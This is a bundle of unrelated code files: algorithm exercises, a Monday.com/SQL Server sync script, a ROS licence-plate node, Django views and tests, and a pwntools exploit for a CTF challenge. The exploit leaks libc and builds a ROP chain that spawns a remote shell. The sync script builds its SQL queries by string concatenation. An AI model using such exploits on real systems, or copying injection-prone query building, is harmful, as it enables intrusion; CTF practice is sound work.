{"seq_id":"38056070411","text":"class Solution:\n    def isIsomorphic(self, s: str, t: str) -> bool:\n        print(f\"{s} - {t}\")\n        replacements = {}\n        if len(s) != len(t):\n            return False\n        for s_char, t_char in zip(s, t):\n            print(f\"{s_char} \", end=\"\")\n            if s_char in replacements:\n                print(f\"found replacement {replacements[s_char]}\")\n                if replacements[s_char] != t_char:\n                    print(\"False\")\n                    return False\n            else:\n                if t_char not in replacements.values():\n                    print(f\"no replacement, adding {s_char}: {t_char}\")\n                    replacements[s_char] = t_char\n                else:\n                    print(f\"{t_char} already used as replacement\")\n                    print(\"False\")\n                    return False\n        print(\"True\")\n        return True\n\n\ninputs = [(\"egg\", \"add\"), (\"badc\", \"baba\"), (\"foo\", \"bar\"), (\"bbbaaaba\", \"aaabbbba\")]\nexpected = [True, False, False, False]\n\nresults = []\nfor i in inputs:\n    sol = Solution()\n    results.append(sol.isIsomorphic(i[0], i[1]))\n\nprint(expected)\nprint(results)\nprint(expected == results) \n\n","repo_name":"woodroww/algorithms","sub_path":"leetcode/isomorphic_strings_205.py","file_name":"isomorphic_strings_205.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
{"seq_id":"4141631606","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# File : lmdb-single.py\n# Author : Jiayuan Mao\n# Email : maojiayuan@gmail.com\n# Date : 01/17/2023\n#\n# This file is part of Jacinle.\n# Distributed under terms of the MIT license.\n\nfrom jacinle.storage.kv.lmdb import LMDBKVStore\n\n\ndef main():\n kv = LMDBKVStore('/tmp/test_1.lmdb', readonly=False)\n\n with kv.transaction():\n kv['a'] = 1\n kv['b'] = 2\n\n assert 'a' in kv and kv['a'] == 1\n assert 'b' in kv and kv['b'] == 2\n assert 'c' not in kv\n\n for k in kv.keys():\n print(k, kv[k])\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"vacancy/Jacinle","sub_path":"examples/kv-lmdb/lmdb-single.py","file_name":"lmdb-single.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"16"} +{"seq_id":"22925740294","text":"# Monday and Local SQL server intagration\n# Written by: Anthony Bradt 613-986-0029\n# Requested by: Victoria Hurrell, Hated by: Christan Slain\n\nimport requests\nimport json\nimport pyodbc\nimport pandas as pd\nimport time\n\napiKey = \"XXX\"\napiUrl = \"https://api.monday.com/v2\"\nheaders = {\"Authorization\": apiKey}\n\ncnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\n \"Server=XXX;\"\n \"Database=XXX;\"\n \"Trusted_Connection=yes;\")\n\n#Add SQL Read Query here: \n#SQLQR = \"SELECT\tstt.sttDescription as 'Status' ,ord.ordSchedShipDate ,ord.ordCustRequestDate as 'Production Completion'\t,sales.ordavValue as 'Designer'\t,ord.ordPONumber as 'Sales Order 3'\t,cust.venCompanyName as 'Customer Name',ord.ordDescription FROM dbo.Orders ord LEFT JOIN dbo.OrderStatuses stt on stt.sttID = ord.sttID LEFT JOIN dbo.OrderAttributeValues sales on sales.ordID = ord.ordID AND sales.atbID = 64 LEFT JOIN dbo.Organizations cust on cust.venID = ord.venID WHERE ord.ordCreatedDateTime > '2019-01-01' AND cust.vencompanyName NOT LIKE 'Test Customer' AND ord.ordPONumber NOT LIKE '0000%' AND sales.ordavValue = 'Heather Tardioli' \"\n\n#Must match Desingers names with Board ID\nDesigners = [\"Elnaz Shahrokhi\" ,\"Kaitlyn North\" ,\"Heather Tardioli\" ,\"Wael Bakr\" ,\"Aviva Ben-Choreen\" ,\"Janet Spencer\" ,\"Karley Scrivens\" ,\"Kimberly Silcox\" ,\"Ola Elmaghraby\" ,\"Sarah Clifford\" ,\"Victoria Campbell\" ,\"Caroline Castrucci\" ,\"Corey Laurysen\" ,\"Zeina Agha\", \"Jinan Al-Ani\"]\nBoardID = [\"840778743\" ,\"840784633\" ,\"840780676\" ,\"840788263\" ,\"701886327\" ,\"840782335\" ,\"840785291\" ,\"840786638\" ,\"840787425\" ,\"840792017\" ,\"840789036\" ,\"840785983\" ,\"845011609\" ,\"840791247\", \"840783457\"]\nStats = [\"Cancelled\",\"Shipped\",\"Completed\",\"Available for Confirmation\",\"Available to Schedule\",\"Blank5\",\"Confirmation Notification\",\"Copy\",\"Design Import\",\"In Production\",\"Invoiced\",\"Left CP\",\"PO Needed\",\"Scheduled\",\"Review for Scheduling\",\"Service Schedulable\",\"Ready to Ship\",\"Ready to Ship CP\",\"Material List Available\",\"Nested\",\"Left Carleton Place\"]\n#Hard coded Status, order matters very much, must match monday's side\nprint(len(Stats))\n\n\"\"\" \n'Cancelled', 'value': '{\"index\":0}'\n'Shipped', 'value': '{\"index\":1}'},\n'Completed', 'value': '{\"index\":2}'},\n'Available for Confirmation', 'value': '{\"index\":3}'}\n'Available to Schedule', 'value': '{\"index\":4}'},\n'Confirmation Notification', 'value': '{\"index\":6}'}\n'Copy', 'value': '{\"index\":7}'}\n'Design Import', 'value': '{\"index\":8}'},\n'In Production', 'value': '{\"index\":9}'}\n'Invoiced', 'value': 
'{\"index\":10}'},\n'Left CP', 'value': '{\"index\":11}'},\n'PO Needed', 'value': '{\"index\":12}'}\n'Scheduled', 'value': '{\"index\":13}'}\n'Review For Scheduling', 'value': '{\"index\":14}'}\n\"\"\"\n \ndef SQLRead(Des): #Pass Designer name to SQL, Return Full SQL read\n try:\n SQLQR = \"SELECT\tstt.sttDescription as 'Status' ,ord.ordSchedShipDate ,ord.ordCustRequestDate as 'Production Completion'\t,sales.ordavValue as 'Designer'\t,ord.ordPONumber as 'Sales Order 3'\t,cust.venCompanyName as 'Customer Name',ord.ordDescription, processor.ordavValue as 'Processor', ord.ordOrderDate FROM dbo.Orders ord LEFT JOIN dbo.OrderStatuses stt on stt.sttID = ord.sttID LEFT JOIN dbo.OrderAttributeValues sales on sales.ordID = ord.ordID AND sales.atbID = 64 LEFT JOIN dbo.OrderAttributeValues processor on processor.ordID = ord.ordID AND processor.atbID = 75 LEFT JOIN dbo.Organizations cust on cust.venID = ord.venID WHERE ord.ordCreatedDateTime > DATEADD(year,-1,GETDATE()) AND cust.vencompanyName NOT LIKE 'Test Customer' AND ord.ordpoNumber NOT LIKE '%-D' AND ord.ordPONumber NOT LIKE '0000%' AND sales.ordavValue = '\"\n SQLQR += Des\n SQLQR += \"'\"\n df = pd.read_sql(SQLQR, cnxn)\n return df\n except: #If Failed, Try again. Bandain for timeout SQL Requests\n print(\"SQL failed\")\n SQLRead(Des)\n \ndef STRClean(CleanME): #Removes Extra char on Strings\n CleanME = str(CleanME)\n CleanME = CleanME[2:-2]\n return CleanME\n \ndef CheckSTR(ID,Data): \n Data = str(Data)\n ID = str(ID)\n ID += '\"'\n #print(ID)\n if ID in Data:\n return 1\n else:\n return 0\n \ndef CheckSTROld(ID,Data):\n Data = str(Data)\n ID = str(ID)\n #print(ID)\n if ID in Data:\n return 1\n else:\n return 0\n\ndef MonQuery(BID): #Takes Monday Board ID, returns that boards items \n #'query {boards (ids: 695573207){items{name column_values{title id value}}}}'\n query = 'query {boards (ids:'\n query += BID\n query += '){items{name id column_values{title id value}}}}'\n data = {'query' : query}\n r = requests.post(url=apiUrl, json=data, headers=headers) # make request\n x = r.json()\n # print(r)\n return x\n\ndef SQLToMon(FullQ,SID,BID): #Takes SQL Data, breakes in into parts and passes it to Funtion WriteMon\n Status = FullQ['Status'] #Sperates each line item\n ShipDate = FullQ['ordSchedShipDate']\n ProdComp = FullQ['Production Completion']\n Design = FullQ['Designer']\n Item = FullQ['Customer Name']\n Descrip = FullQ['ordDescription']\n OrdDate = FullQ['ordOrderDate']\n Process = FullQ['Processor']\n Process = STRClean(Process.values) #Cleans each item \n Status = STRClean(Status.values)\n ShipDate = DateClean(ShipDate) #Dates and STR use diffrent Clean functions\n ProdComp = DateClean(ProdComp)\n OrdDate = DateClean(OrdDate)\n Design = STRClean(Design.values)\n Item = STRClean(Item.values)\n Descrip = STRClean(Descrip.values)\n print(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process)\n WriteMon(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process)\n return 0\n \ndef DateClean(Date):\n Date = str(Date)\n Date = Date.split(\"Name:\",1)[0]\n Date = Date[4:]\n Date = Date.replace(\" \",\"\")\n Date = Date.replace(\"\\n\",\"\")\n return Date\n\ndef WriteMon(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process):\n IID = MakeItem(BID,Item)\n IID = CleanID(str(IID))\n print(IID)\n ChangeItemValues(BID,IID,\"text_1\",DoubleDump(SID))\n ChangeItemValues(BID,IID,\"text\",DoubleDump(Descrip))\n ChangeItemValues(BID,IID,\"text7\",DoubleDump(Process))\n 
ChangeItemValues(BID,IID,\"text1\",DoubleDump(Design))\n ChangeItemValues(BID,IID,\"date\",DateDump(ProdComp))\n ChangeItemValues(BID,IID,\"date4\",DateDump(ShipDate))\n ChangeItemValues(BID,IID,\"date1\",DateDump(OrdDate))\n print(Status)\n for z in range(len(Stats)):\n if CheckSTROld(Stats[z],Status):\n ChangeItemValues(BID,IID,\"status\",StatDump(z))\n \n \n # ChangeItemValues(BID,IID,\n return 0\n \ndef StatDump(Value):\n VStat = '{\"index\":%s}'%(Value)\n VStat = json.dumps(VStat)\n return VStat\n \ndef DoubleDump(Value):\n Value = json.dumps(json.dumps(Value))\n return Value\n \ndef DateDump(Value):\n VDate = '{\"date\": \"%s\"}'%(Value)\n VDate = json.dumps(VDate)\n return VDate\n \ndef MakeItem(ID,Item):\n Item = str(Item)\n query = 'mutation { create_item (board_id:'\n query += ID\n query += ', group_id: \"topics\", item_name:\"'\n query += Item\n query += '\") { id } }'\n data = {'query' : query}\n r = requests.post(url=apiUrl, json=data, headers=headers) # make request\n print (r)\n return (r.json());\n # return r\n\ndef CleanID(NotCleanID):\n print(\"To be Cleaned:\" + NotCleanID)\n NotCleanID = NotCleanID.split(\"'id':\",1)[1]\n NotCleanID = NotCleanID.split(\"}}\",1)[0]\n NotCleanID = NotCleanID.replace(\"'\",\"\")\n NotCleanID = NotCleanID.replace(\" \",\"\")\n return NotCleanID\n \ndef CleanItemID(ItemID):\n ItemID = ItemID.split(\"'id':\",1)[1]\n ItemID = ItemID.split(\"'column_values':\",1)[0]\n ItemID = ItemID.replace(\"'\",\"\")\n ItemID = ItemID.replace(\",\",\"\")\n ItemID = ItemID.replace(\" \",\"\")\n return ItemID\n \n\"\"\"\ntext_1 - sales order#\ntext - Description\nstatus - Production status\ndate4 - Sched Ship date\ndate - Production completion\nperson - Desginers\n\"\"\"\n\ndef ChangeItemValues(BID,IID,CID,Value):\n try:\n print (\"Flag: 0\")\n query = str('mutation {change_column_value(board_id:%s, item_id:%s,column_id:\"%s\",value:%s){id}}'%(BID,IID,CID,Value))\n print (query)\n data = {'query' : query}\n print (\"Flag: 1\")\n r = requests.post(url=apiUrl, json=data, headers=headers, timeout=240) # make request\n print (\"Flag: 2\")\n return (r.json());\n except:\n print(\"failed\")\n print(BID)\n print(IID)\n print(CID)\n print(Value)\n\n\"\"\"\ndef FindWon(json_data):\n data_dict = dict(json_data)\n won_list = []\n if (\"data\" in data_dict.keys()):\n dict1 = data_dict[\"data\"]\n if (\"boards\" in dict1.keys()):\n for item in dict1[\"boards\"]:\n if (\"items\" in item.keys()):\n for i in item[\"items\"]:\n if (\"column_values\" in i.keys()):\n for ix in i[\"column_values\"]:\n if (\"value\" in ix.keys()):\n if (\"61557-D\" in ix[\"value\"]):\n won_list.append(i)\n return (won_list);\nprint(type(MonQuery(\"695573207\")))\nprint(FindWon(MonQuery(\"695573207\")))\n\"\"\"\n\nlvals = []\ndef rec_won(data,key,reg,depth): #Majic Sause, This burger aint the same without it. 
Credits:Kyle Lawrynuik \n flag = []\n new_flag = []\n global lvals\n if isinstance(data, dict):\n try:\n if (reg == str(data[key])):\n flag.append(depth)\n except KeyError as e:\n pass\n for element in data:\n for el in rec_won(data[element],key,reg,depth):\n flag.append(el)\n if isinstance(data, list):\n for element in data:\n for el in rec_won(element,key,reg,depth):\n flag.append((el))\n for element in flag:\n if(element>0):\n new_flag.append(element-1)\n if(element==0):\n #print(data)\n lvals.append(data)\n return new_flag\n\n\"\"\"\ninput(\"part 0 -- Testing \")\nlvals = []\ndata = MonQuery(\"695573207\")\nprint(type(data))\n#print(data)\nsalesOrderID = \"63020\"\nsalesOrderID = json.dumps(salesOrderID)\nrec_won(data=dict(data),key=\"value\",reg=salesOrderID,depth=2)\nprint(lvals)\n\n\"\"\"\n\n\n#Main \ninput(\"Part 1 -- Add missing items to monday\")\ncount = 0\nfor x in Designers: #Run through for each designer\n print(x)\n # input(\"Enter to continue\")\n time.sleep(60)\n df = SQLRead(x) #Runs preset SQL Query for the designers name \n print(df) #Prints SQL Query using pandas\n print(BoardID[count]) \n MonData = MonQuery(BoardID[count])#Takes hard coded desingers board ID and returns Monday Items \n print(MonData)\n \n for y in df.index:#For every item returned by the SQL Query\n time.sleep(1)\n TestDF = df.loc[[y]] #Pass just one item at a time\n print(TestDF)\n SalesDF = TestDF['Sales Order 3'] #Isolate Sales Order number\n SalesID = STRClean(SalesDF.values)#Clean Sales Order number\n print(SalesID)\n \n if CheckSTR(SalesID,MonData) == 0: #Check if Sales Order number is anywhere in the monday board\n print(\"passing SQL to Monday\")\n print(df.loc[y])\n SQLToMon(df.loc[[y]],SalesID,BoardID[count]) #Passes SQL item to be written to Monday.com \n \n else: #Item already exist in monday\n lvals = [] #Preforms the same as SQLToMon, should be a function of its own\n SalesID = json.dumps(SalesID)\n rec_won(data=dict(MonData),key=\"value\",reg=SalesID,depth=2)\n ItemID = CleanItemID(str(lvals))\n Status = TestDF['Status']\n Status = STRClean(Status.values)\n ProdDate = TestDF['Production Completion']\n SchedDate = TestDF['ordSchedShipDate']\n SchedDate = DateClean(SchedDate)\n ProdDate = DateClean(ProdDate)\n for z in range(len(Stats)):\n if CheckSTROld(Stats[z],Status):\n ChangeItemValues(BoardID[count],ItemID,\"status\",StatDump(z))\n ChangeItemValues(BoardID[count],ItemID,\"date\",DateDump(ProdDate))\n ChangeItemValues(BoardID[count],ItemID,\"date4\",DateDump(SchedDate))\n print(\"update\")\n print(StatDump(z)) \n \n count += 1\n \ninput(\"Finished\")\n","repo_name":"aajjbb613/Insight_to_Monday","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70886135047","text":"import setuptools\n\n# Открытие README.md и присвоение его long_description.\nwith open(\"README.md\", \"r\") as fh:\n\tlong_description = fh.read()\n\n# Определение requests как requirements для того, чтобы этот пакет работал. Зависимости проекта.\nrequirements = [\"requests<=2.21.0\", \"selenium\"]\n\n# Функция, которая принимает несколько аргументов. 
Она присваивает эти значения пакету.\nsetuptools.setup(\n\tname=\"dnevniklib\",\n\tversion=\"1.0\",\n\tauthor=\"Ivan Kriventsev\",\n\tauthor_email=\"dirtyhornet277@outlook.com\",\n\tdescription=\"Library for automated work with dnevnik.mos.ru\",\n\n\tlong_description=long_description,\n\tlong_description_content_type=\"text/markdown\",\n\turl=\"https://github.com/dirtyhornet277/dnevniklib\",\n\tpackages=setuptools.find_packages(),\n\tclassifiers=[\n\t],\n\tpython_requires='>=3.6',\n)\n","repo_name":"DnevnikLib/dnevniklib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"28516499015","text":"#!/usr/bin/env python3\n\n# import libraries\nimport rospy\nimport cv2\nimport numpy as np\nimport car_plate_number_test\nimport sensor_msgs\nfrom geometry_msgs.msg import PoseStamped\nfrom test_pkg.msg import CarData\nfrom cv_bridge import CvBridge\nimport cv2\n\nclass License_Detect:\n def __init__(self):\n print(\"Start\")\n rospy.init_node(\"car_plate_number\")\n rospy.Subscriber(\"/camera/rgb/image_raw\",sensor_msgs.msg.Image,self.ImageCallback)\n rospy.Subscriber('/move_base_simple/goal',PoseStamped,self.start)\n self.car_msg_pub = rospy.Publisher('/Car_Data',CarData,queue_size=1)\n self.image = None\n self.oldval = 0\n self.bridge = CvBridge()\n rospy.spin()\n \n def start(self,data):\n print(\"success\")\n car_number , img ,detected= car_plate_number_test.find_number()\n # print(car_number)\n\n carmsg = CarData()\n\n if detected:\n carmsg.car_number_plate = car_number\n carmsg.height = img.shape[0]\n carmsg.width = img.shape[1]\n carmsg.data = self.bridge.cv2_to_imgmsg(img).data\n carmsg.detected = detected\n self.car_msg_pub.publish(carmsg)\n else:\n carmsg.car_number_plate = \" \"\n carmsg.detected = detected\n\n self.car_msg_pub.publish(carmsg)\n\n\n# 집에 가고 싶다...\n\n def ImageCallback(self, data):\n # print(data.height) # value : 1080\n # print(data.width) # value : 1920\n # print(data.encoding) # value : rgb8\n # print(data.is_bigendian) # value : 0\n # print(data.step) # value : 5760\n bridge = CvBridge()\n # cv_image = bridge.imgmsg_to_cv2(image_message, desired_encoding='passthrough')\n img_ori = bridge.imgmsg_to_cv2(data,'bgr8')\n # print(img_ori.shape)\n self.image = cv2.resize(img_ori, (640, 480), interpolation=cv2.INTER_CUBIC)\n # self.image = img_ori.copy()\n # print(self.image[0][0]) # row : 1080 col : 1920\n # print(np.sum(self.image))\n cur = np.sum(self.image)\n print(cur - self.oldval if cur > self.oldval else 0)\n self.oldval = cur\n\n\n\n cv2.imshow(\"Image window\", self.image)\n cv2.waitKey(3)\n # print(car_plate_number_test.find_number(data))\n \n \nif __name__ ==\"__main__\":\n start = License_Detect()\n ","repo_name":"chunggilan/Autonomous-Multi-Robot-Parking-System","sub_path":"test_pkg/scripts/car_plate_ros.py","file_name":"car_plate_ros.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"27893530174","text":"#!/usr/bin/env python\n\nfrom pwn import *\n\ncontext.log_level = \"debug\"\n\nelf = \"./hacker_system_ver2\"\n\nunsorted_bin_off = 0x3c4b78\nsystem_off = 0x45390\nbin_sh_off = 0x18cd57\n\npop_rdi_ret = 0x400fb3\n\n#p = process(elf)\np = remote(\"111.230.149.72\", 10008)\n\ndef add(name, age, length, intro):\n p.recvuntil(\"> \")\n p.sendline(\"1\")\n p.recvuntil(\"input the hacker's name:\")\n p.sendline(name)\n 
p.recvuntil(\"input the hacker's age:\")\n p.sendline(str(age))\n p.recvuntil(\"input the introduce's length:\")\n p.sendline(str(length))\n p.recvuntil(\"input the intro:\")\n p.send(intro)\n\ndef printh(length, name):\n p.recvuntil(\"> \")\n p.sendline(\"2\")\n p.recvuntil(\"input name length:\")\n p.sendline(str(length))\n p.recvuntil(\"input hacker's name:\")\n p.send(name)\n \ndef delete(length, name):\n p.recvuntil(\"> \")\n p.sendline(\"3\")\n p.recvuntil(\"input name length:\")\n p.sendline(str(length))\n p.recvuntil(\"input hacker's name:\")\n p.send(name)\n\n\nadd(\"A\", 1, 0x100, \"\\n\")\nadd(\"A\", 1, 0x3, \"123\")\n\ndelete(2, \"A\\n\")\n\nprinth(2, \"A\\n\")\n\np.recvuntil(\"intro:\")\nlibc_base = u64(p.recv(6).ljust(8, \"\\x00\"))-unsorted_bin_off\nlog.info(\"libc_base: \"+hex(libc_base))\n\nsystem_addr = libc_base+system_off\nbin_sh_addr = libc_base+bin_sh_off\n\npayload = p8(0)*0x38\npayload += p64(pop_rdi_ret)\npayload += p64(bin_sh_addr)\npayload += p64(system_addr)\nprinth(0x50, payload)\n\np.interactive()\n","repo_name":"0x3f97/pwn","sub_path":"hgame2018/hacker-system2/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"16"} +{"seq_id":"1258608152","text":"soma = 0\n\nnum1 = int(input())\nnum2 = int(input())\n\nif num1 >= num2:\n maior = num1\n menor = num2\nelse:\n maior = num2\n menor = num1\n\nif maior % 2 == 0:\n maior -= 1\nelse:\n maior -= 2\n\nwhile maior > menor:\n soma += maior\n maior -= 2\n\nprint(soma)","repo_name":"niverton-felipe/URI_PYTHON","sub_path":"1071.py","file_name":"1071.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74408158087","text":"from django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.db import transaction\n\nclass PostViewTest(APITestCase):\n def setUp(self):\n self.register_url = reverse('register')\n self.post_list_url = reverse('posts')\n self.user_data = {\n 'username': 'testuser',\n 'email': 'test@example.com',\n 'password': 'testpassword'\n }\n\n\n # Step 1: Create a user by hitting the registration endpoint\n response = self.client.post(self.register_url, self.user_data, format='json')\n # print(response.data)\n # self.assertEqual(response.data['status'], status.HTTP_201_CREATED)\n self.token = response.data['data']['token']\n \n self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.token}')\n\n def create_single_post(self):\n post_data = {'title': 'title', 'body': 'body'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n return response\n\n def create_post(self):\n for i in range(5):\n post_data = {'title': f'title {i+1}', 'body': f'body {i+1}'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n\n def test_create_posts(self):\n for i in range(5):\n post_data = {'title': f'title {i+1}', 'body': f'body {i+1}'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n \n response = self.client.get(self.post_list_url)\n # self.assertEqual(response.data['status'], status.HTTP_200_OK)\n self.assertEqual(len(response.data['data']), 5)\n\n\n def test_get_all_posts(self):\n self.create_post()#\n response = self.client.get(self.post_list_url)\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n 
self.assertEqual(len(response.data['data']), 5)\n\n    def test_get_single_post(self):\n        self.create_post()\n        response = self.client.get(\"/api/posts/1\")\n        self.assertEqual(response.data['status'], status.HTTP_200_OK)\n\n    def test_update_post(self):\n        self.create_post()\n        response = self.client.put(\"/api/posts/1\",{'title':'updated title','body':'updated body'},format='json')\n        self.assertEqual(response.data['status'], status.HTTP_200_OK)\n\n    def test_delete_post(self):\n        self.create_post()\n        response = self.client.delete(\"/api/posts/1\")\n        self.assertEqual(response.data['status'], status.HTTP_204_NO_CONTENT)\n    \n","repo_name":"sarangkkl/blog_api","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
{"seq_id":"35687358540","text":"import csv\nimport re\nimport string\nfrom time import sleep\n\nfrom nltk import PorterStemmer\nfrom nltk.corpus import stopwords\n\n\ndef preprocess_emotions_script():\n    print()\n    print(\"*** RUNNING IN BACKGROUND >>> Emotion preprocessing in progress...\")\n    sleep(0.2)\n    # # # TOKENIZATION # # #\n    emoticons_str = r\"\"\"\n    (?:\n        [:=;] # Eyes\n        [oO\\-]? # Nose (optional)\n        [D\\)\\]\\(\\]/\\\\OpP] # Mouth\n    )\"\"\"\n\n    regex_str = [\n        emoticons_str,\n        r'<[^>]+>', # HTML tags\n        r'(?:@[\\w_]+)', # @-mentions\n        r\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", # hash-tags\n        r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs\n\n        r'(?:(?:\\d+,?)+(?:\\.?\\d+)?)', # numbers\n        r\"(?:[a-z][a-z'\\-_]+[a-z])\", # words with - and '\n        r'(?:[\\w_]+)', # other words\n        r'(?:\\S)' # anything else\n    ]\n\n    tokens_re = re.compile(r'(' + '|'.join(regex_str) + ')', re.VERBOSE | re.IGNORECASE)\n    emoticon_re = re.compile(r'^' + emoticons_str + '$', re.VERBOSE | re.IGNORECASE)\n\n    def tokenize(s):\n        return tokens_re.findall(s)\n\n    def preprocess(s, lowercase=False):\n        tokens = tokenize(s)\n        # if lowercase:\n        #     tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]\n        return tokens\n\n    punteggiatura = list(string.punctuation) ### We take punctuation into account\n    stop_words = stopwords.words('english') + punteggiatura\n    ps = PorterStemmer()\n    # # # ------------- # # #\n\n    with open('text_emotion.csv', 'r') as emotion_file:\n        reader = csv.reader(emotion_file, delimiter=',')\n        for row in reader:\n            content = row[3]\n            emotion = row[1]\n            # print(line)\n            # print()\n            content = re.sub(r\"(?:\\@|https?\\://)\\S+\", \"\", content)\n            # content = re.sub(r\"http\\S+\", \"\", content)\n            # print(\"TWEET TOKENIZATION [\",i,\"]\")\n            # print(\"TWEET TEXT > \", preprocess(tweet)) # print the tokens of the tweet text\n            # print(\"\\n\")\n            # i = i + 1\n            # print(content)\n\n            # list of terms without the stop words (SW)\n            content_prepro = [ps.stem(term) + \" \" for term in preprocess(content) if term not in stop_words]\n\n            # print(content_prepro)\n            # print()\n            # print(emotion)\n\n            with open('text_emotion_prepro.csv', 'a+', encoding='utf8') as file:\n                file.writelines(content_prepro)\n                file.writelines(\",\")\n                file.writelines(emotion)\n                file.write(\"\\n\")\n    print(\"*** Done! You can proceed...\\n\")","repo_name":"Andry92/emotional-film-advice","sub_path":"Preprocess_Emotions.py","file_name":"Preprocess_Emotions.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
{"seq_id":"18471565575","text":"class Solution:\r\n    def carFleet(self, target, position, speed):\r\n        output, maximum = 0, 0\r\n        times = [float(target - p) / s for p, s in sorted(zip(position, speed),reverse = True)] \r\n        for time in times:\r\n            if time > maximum:\r\n                maximum = time\r\n                output += 1\r\n\r\n        return output\r\n","repo_name":"KnightDanny/A2SV","sub_path":"Car Fleet.py","file_name":"Car Fleet.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
{"seq_id":"9781558230","text":"from audioop import reverse\nimport json\nimport math\nfrom wsgiref import headers\nfrom xml.dom import ValidationErr\nfrom numpy import append\nfrom .models import Choice_Model, darmangar, info, darmanjo_form\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse\nfrom django.shortcuts import render, HttpResponseRedirect, HttpResponse, get_object_or_404, get_list_or_404, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import TemplateView, CreateView,FormView, DetailView\nfrom .forms import infoss, darmanjo_formss\nfrom .extentions.excel_validation import exel_reader\nimport xlrd\nfrom django.utils.crypto import get_random_string\nimport random\nfrom pypep import Pasargad, ApiError\nimport pandas as pd\nimport datetime\n\nclass home(TemplateView):\n    template_name = \"forms/home.html\"\n\n\n\n#this form view is for receiving the uploaded Excel file\ndef get_name(request):\n    if request.method == 'POST':\n        form = infoss(request.POST, request.FILES)\n        if form.is_valid():\n            upl = form.cleaned_data['upl']\n            form.save()\n\n            wb = xlrd.open_workbook(\"media/upload-file/\" + str(upl))\n            sh = wb.sheet_by_index(0)\n            columns = sh.ncols - 2\n            num_rows = sh.nrows - 1\n            print(num_rows)\n            if sh.cell_value(0,0) == \"نام\" and sh.cell_value(0,1) == \"خانوادگی\" and sh.cell_value(0,2) == \"موبایل\" and sh.cell_value(0,3) == \"ایمیل\":\n                for i in range(num_rows):\n                    the_slug = get_random_string(3,'0123456789') # 3 characters, only digits. 
\n the_slugs = get_random_string(3,'0123456789')\n m = str(the_slug) + \"-\" + str(the_slug)\n o = i + 1\n\n d = sh.cell_value(o,2)\n\n a = info.objects.create( mobile=d)\n return HttpResponse(\"فایل با موفقیت ثبت شد\")\n else:\n return HttpResponse(\"مشکلی در فایل وجود دارد احتمالا از قوانین فایل پیروی نکردید\")\n #return HttpResponseRedirect('home')\n else:\n form = infoss()\n\n return render(request, 'forms/form.html', {'form': form})\n\n\n\nclass Submit_Form(TemplateView):\n template_name = \"forms/submit.html\"\n\n\n\n\n#function form baraye form darmanjo\ndef detailsick(request, slug):\n deta = get_object_or_404(info, slug=slug)\n detas = info.objects.get(slug=slug)\n darm = None\n informations = None\n page_obj = None\n darms = []\n rel_info = None\n list_count =[]\n #form\n if request.method == \"POST\":\n form = darmanjo_formss(request.POST)\n a = request.POST\n if form.is_valid():\n global talk_about\n talk_about = form.cleaned_data['talk_about']\n form.save(commit=False)\n print(\"aa\"+str(rel_info))\n darm = darmangar.objects.filter(keyword__in=talk_about.split())\n count = darm.count()\n half_count = math.ceil(count/2)\n print(half_count)\n\n for x in range(half_count):\n list_count.append(x+1)\n\n print(list_count)\n print(darms)\n informations = darmanjo_form.objects.create(information=deta, talk_about=talk_about)\n else:\n form = darmanjo_formss()\n return render(request, \"forms/detailsick.html\", {'deta':deta,'detas':detas,'form':form,'darm':darm,'page_obj':page_obj,'darms':darms, 'list_count':list_count, 'informations':informations})\n\n#detail form\ndef detailform(request, slug, pk, id):\n #for url filter\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n fname = None\n lname = None\n deta = info.objects.filter(slug=slug)\n deta1 = info.objects.get(slug=slug)\n darman = get_object_or_404(darmangar, pk=pk)\n detass = info.objects.get(slug=slug)\n c = info.objects.get(slug=slug)\n #informations = darmanjo_form.objects.update(talk_about=detas,rel_info=darman, information = detas)\n informations = darmanjo_form.objects.filter(information__fname__icontains=deta1.fname, information__lname__icontains=deta1.lname,id=darmanjo_fo.id).update(rel_info=darman, information=detass)\n \n return render(request, 'forms/detailform.html', 